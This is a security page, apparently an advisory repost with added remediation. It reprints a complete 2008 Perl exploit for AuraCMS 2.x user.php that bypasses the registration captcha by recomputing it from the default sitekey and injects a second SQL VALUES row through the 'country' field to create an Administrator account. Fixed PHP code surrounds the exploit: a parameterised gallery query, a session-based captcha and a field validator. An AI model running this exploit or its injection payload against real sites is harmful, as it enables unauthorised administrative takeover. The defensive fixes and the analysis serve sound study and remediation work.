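 * being taken from the request.
 */
function fetch_gallery(mysqli $db, string $albums, string $sort, int $offset, int $limit): array
{
    $sortColumns = ['id' => '`id`', 'name' => '`name`'];      // assumed column names
    $orderBy = $sortColumns[$sort] ?? '`id`';
    $offset  = max(0, $offset);
    $limit   = max(1, min(100, $limit));
    $stmt = $db->prepare("SELECT * FROM `mod_gallery` WHERE `kid` = ? ORDER BY $orderBy LIMIT ?, ?");
    $stmt->bind_param('sii', $albums, $offset, $limit);
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
    $stmt->close();
    return $rows;
}

// Usage (against a real database):
// $page  = fetch_page(db(), $_GET['id'] ?? '');
// $items = fetch_gallery(db(), (string)($_GET['albums'] ?? ''), (string)($_GET['sort'] ?? 'id'), 0, 20);
```

The `LIMIT` operands are also bound rather than interpolated; in the original line 200 `$image` and `$limitimage` are spliced in the same way as `$albums`, so they deserve the same treatment.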
AuraCMS 2.x (user.php) Security Code Bypass / Add Administrator Exploit

Exploit:
Code:
#!/usr/bin/perl
#
# Indonesian Newhack Security Advisory
# ------------------------------------
# AuraCMS 2.x (user.php) - Security Code Bypass & Add Administrator Exploit
# Date     : Feb 28 2008 08:00PM
# Software : AuraCMS
# Version  : 2.0
#            2.1
#            2.2.1
# Vendor   : http://www.auracms.org/
#
# ------------------------------------
# Audited by  : NTOS-Team
# Location    : Indonesia | http://newhack.org
# Description :
#
# Bug in the file "user.php" in the "/content" directory
#---//---
# 59. if (!$nama || preg_match("/[^a-zA-Z0-9_-]/", $nama)) $error .= "Karakter Username tidak diizinkan kecuali a-z,A-Z,0-9,-, dan _<br />";
# 60. if (strlen($nama) > 10) $error .= "Username Terlalu Panjang Maksimal 10 Karakter<br />";
# 61. if (strrpos($nama, " ") > 0) $error .= "Username Tidak Boleh Menggunakan Spasi";
# 62. if ($koneksi_db->sql_numrows($koneksi_db->sql_query("SELECT user FROM useraura WHERE user='$nama'")) > 0) $error .= "Error: Username ".$nama." sudah terdaftar , silahkan ulangi.<br />";
# 63. if ($koneksi_db->sql_numrows($koneksi_db->sql_query("SELECT user FROM temp_useraura WHERE user='$nama'")) > 0) $error .= "Error: Username ".$nama." sudah terdaftar , silahkan ulangi.<br />";
# 64. if ($koneksi_db->sql_numrows($koneksi_db->sql_query("SELECT email FROM useraura WHERE email='$email'")) > 0) $error .= "Error: Email ".$email." sudah terdaftar , silahkan ulangi.<br />";
# 65. if ($koneksi_db->sql_numrows($koneksi_db->sql_query("SELECT email FROM temp_useraura WHERE email='$email'")) > 0) $error .= "Error: Email ".$email." sudah terdaftar , silahkan ulangi.<br />";
# 66. if (!nama) $error .= "Error: Formulir Nama belum diisi , silahkan ulangi.<br />";
# 67. if ($cekperaturan != "1") $error .= "You should be agree with rules and conditions of use!<br />";
# 68. if (!nama) $error .= "Error: Formulir Nama belum diisi , silahkan ulangi.<br />";
# 69. if (!password) $error .= "Error: Formulir Password belum diisi , silahkan ulangi.<br />";
# 70. if ($password != $rpassword) $error .= "Password and Retype Password Not Macth.<br />";
# 71. if (!country) $error .= "Error: Formulir Negara belum diisi , silahkan ulangi.<br />";
# 72. checkemail($email);
# 73. $code = substr(hexdec(md5("".date("F j")."".$_POST['random_num']."".$sitekey."")), 2, 6);
# 74. if (extension_loaded("gd") AND $code != $_POST['gfx_check']) $error .= "Error: Security Code Invalid<br />";
# 75.
# 76.
# 77. if ($error){
# 78.   $tengah .='<table width="100%" border="0" cellspacing="0" cellpadding="0" class="middle"><tr><td><table width="100%" class="bodyline"><tr><td align="left"><img src="images/warning.gif" border="0"></td><td align="center"><font class="option">'.$error.'</font></td><td align="right"><img src="images/warning.gif" border="0"></td></tr></table></td></tr></table>';
# 79. }else{
# 80.   $hasil1 = $koneksi_db->sql_query("INSERT INTO useraura (user, email, password , level, tipe, negara)VALUES('$nama', '$email', '$password','User','aktif', '$country')" );
# ---//---
# => Security Code Bypass
# lines 73 - 74 are the interesting code; let's dissect these 2 lines slowly
# $sitekey is already defined in the file "config.php" in the "includes" directory
# $_POST['random_num'] is a random value sent through the user registration form as a hidden field [not filled in by the user]
# $_POST['gfx_check'] is the value the USER sends through the registration form for the Security Code
# the full details can be read at http://ezine.echo.or.id/ezine18/e18.005.txt
#
# => Add Administrator [INSERT method]
# ok... we can already bypass the security code, now let's create a new admin on the target site :p
# line 71. if the "country" variable is not filled in, the result is $error, but sadly that is the only rule :(
# look at line 80.
# VALUES('$nama', '$email', '$password','User','aktif', '$country')   again, there is no filtering here
# what are you thinking... mmm... interesting... naughty... evil... but BEAUTIFUL, isn't it... ;)
# yes... what if we think like this ;
#
# VALUES('$nama', '$email', '$password','User','aktif', 'Indonesia['),('Attacker', '[email protected]', 'MD5_Pass', 'Administrator', 'aktif', 'Undergr0und]')" );
#
# now this is what you call p0rn0c0d3...,
# one registration session, 2 users created: the first is the user matching the form input, the second is an Administrator user, the result of the user's NAUGHTINESS :D
# thanks to the author of http://www.milw0rm.com/papers/149
#
# => Simple Fix
# 1. Security Code
#    Replace it with a session-based Captcha, and pick a Captcha that is not easily read by OCR
# 2. Add Administrator
#    Replace line 71. in the file "user.php" with ;
# ---//---
# 71. if (!$country || preg_match("/[^a-zA-Z]/", $country)) $error .= "Error: Formulir Negara belum diisi , silahkan ulangi.<br />";
# ---//---
#
# => Attention!
# "This exploit was made for learning, testing and proving what we have studied"
# Any misuse and damage resulting from this exploit is not our responsibility
#
# =>Newhack Technology, OpenSource & Security
# ~ NTOS-Team->[fl3xu5,opt1lc] ~
#

use Digest::MD5 qw(md5_hex);
use LWP::UserAgent;
use Getopt::Long;
no warnings;

if(!$ARGV[1]) {
    print "\n |--------------------------------------------------|";
    print "\n |          Indonesian Newhack Technology           |";
    print "\n |--------------------------------------------------|";
    print "\n |           AuraCMS <= 2.2.1 (user.php)            |";
    print "\n |              1.Security Code Bypass              |";
    print "\n |               2.Add Administrator                |";
    print "\n |                Coded by NTOS-Team                |";
    print "\n |--------------------------------------------------|";
    print "\n | exploit berhasil jika magic_quotes_gpc = off";
    print "\n[!] Penggunaan : ";
    print "\n[>] perl auracms-user.pl [Site] [Path] ";
    print "\n ";
    print "\n[!] Contoh : ";
    print "\n[>] perl auracms-user.pl localhost /auracms2x/";
    print "\n ";
    print "\n";
    exit;
}

$host  = $ARGV[0];
$path  = $ARGV[1];
$injek = "Indonesia'),('t4mugel4p', 'gelap\@banget.gitu', '213aa1379cce2862538be1c046319684','Administrator','aktif', 'DuniaGelap";

@namabulan = qw(January February March April May June July August September October November December);
$sitekey = "x1a1MhphAur4kea7V3Rs820dweOwxIw4n3UgSusyM4nt04";  # default sitekey from config.php
$tgl   = (localtime)[3];
$bln   = (localtime)[4];
$bulan = $namabulan[$bln];
$date  = "$bulan $tgl";

## Breaking the Security Code of AuraCMS 2.x
$browser = LWP::UserAgent->new() or die();
$getgfx  = $browser -> get("http://".$host.$path."?pilih=user&aksi=register",);
$get = $getgfx -> content;
if ($get =~ /random_num" value="(.*?)"><\/td>/) {
    $randnum = $1;
}
$gfx = substr(hex(md5_hex($date.$randnum.$sitekey)), 2, 6);

## Add Administrator process
$browser = LWP::UserAgent->new() or die();
$postingkomen = $browser -> post(
    "http://".$host.$path."?pilih=user&aksi=register",
    [
        "nama"         => "t1pu4n",
        "email"        => "k3tipu\@nie.yea",
        "password"     => "terimakasih",
        "rpassword"    => "terimakasih",
        "country"      => $injek,
        "gfx_check"    => $gfx,
        "random_num"   => $randnum,
        "cekperaturan" => "1",
        "submit"       => "Submit",
    ],
);
$komen = $postingkomen -> content;
if ($komen =~ />Please Login With Your Username and Your Password</) {
    print "[+]Sukses Register User\n";
    print "[+]Silahkan dicoba login\n";
    print "[+]Username : t4mugel4p\n";
    print "[+]Password : t4mugel4p\n";
    exit();
}
if ($komen =~ />Error/) {
    print "[!]Terjadi Kesalahan Pada Proses Register\n";
    exit();
}
print $komen;
print "[!]\n Exploit Gagal!!! ;)\n";

© NTOS-Team
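The security code on lines 73-74 fails because every input to it is known to the client: the date, the `random_num` hidden field the form itself hands out, and a `$sitekey` that installations leave at its default. The advisory's first fix is a session-based captcha; the block below is an added example for this page, not AuraCMS code, showing what that looks like: the expected code is generated with `random_int()`, kept only in the session, compared with `hash_equals()`, and consumed on first use. It also carries a registration validator in the spirit of the advisory's line 71 fix for `country`. An array stands in for `$_SESSION` so the walk-through runs without a web server; the field rules, names and the constructed inputs are assumptions.

```php
<?php
// Added example (not AuraCMS code): a server-side, single-use security code
// plus registration field rules modelled on the advisory's line 71 fix.
// Helper names, field rules and the constructed inputs are assumptions.

declare(strict_types=1);

/** Generate a 6-character code, remember it in the session, return it for rendering. */
function issue_security_code(array &$session): string
{
    $alphabet = 'ABCDEFGHJKLMNPQRSTUVWXYZ23456789';   // no 0/O, 1/I look-alikes
    $code = '';
    for ($i = 0; $i < 6; $i++) {
        $code .= $alphabet[random_int(0, strlen($alphabet) - 1)];
    }
    $session['gfx_code']   = $code;
    $session['gfx_issued'] = time();
    return $code;
}

/**
 * Verify the submitted code. The expected value never leaves the server, so
 * there is no date/random_num/$sitekey formula for a client to reproduce;
 * the code is removed on the first attempt (success or not) and expires
 * after $ttl seconds.
 */
function verify_security_code(array &$session, string $submitted, int $ttl = 600): bool
{
    $expected = $session['gfx_code'] ?? null;
    $issued   = (int)($session['gfx_issued'] ?? 0);
    unset($session['gfx_code'], $session['gfx_issued']);   // single use, even on failure
    if ($expected === null || time() - $issued > $ttl) {
        return false;
    }
    return hash_equals($expected, strtoupper(trim($submitted)));
}

/**
 * Registration field rules. Username follows the advisory's lines 59-60;
 * country follows its line 71 fix, relaxed to allow spaces. Returns the names
 * of the fields that failed, empty when everything is acceptable.
 */
function validate_registration(array $post): array
{
    $errors  = [];
    $nama    = (string)($post['nama'] ?? '');
    $country = (string)($post['country'] ?? '');
    if (!preg_match('/^[a-zA-Z0-9_-]{1,10}$/', $nama)) {
        $errors[] = 'nama';
    }
    if (!preg_match('/^[a-zA-Z ]{2,64}$/', $country)) {   // letters only: no quote can reach SQL
        $errors[] = 'country';
    }
    return $errors;
}

// Constructed walk-through: an array stands in for $_SESSION.
$session = [];
$shown = issue_security_code($session);
var_dump(verify_security_code($session, strtolower($shown)));  // bool(true)
var_dump(verify_security_code($session, $shown));              // bool(false): already consumed
var_dump(validate_registration(['nama' => 'alice', 'country' => "Indonesia'),('x"]));  // ["country"]
var_dump(validate_registration(['nama' => 'alice', 'country' => 'Indonesia']));        // []
```

Input validation is the second line of defence here, not the first: the INSERT on line 80 should bind `$nama`, `$email`, `$password` and `$country` as parameters rather than interpolating them, so that a character the validator happens to allow can never change the statement.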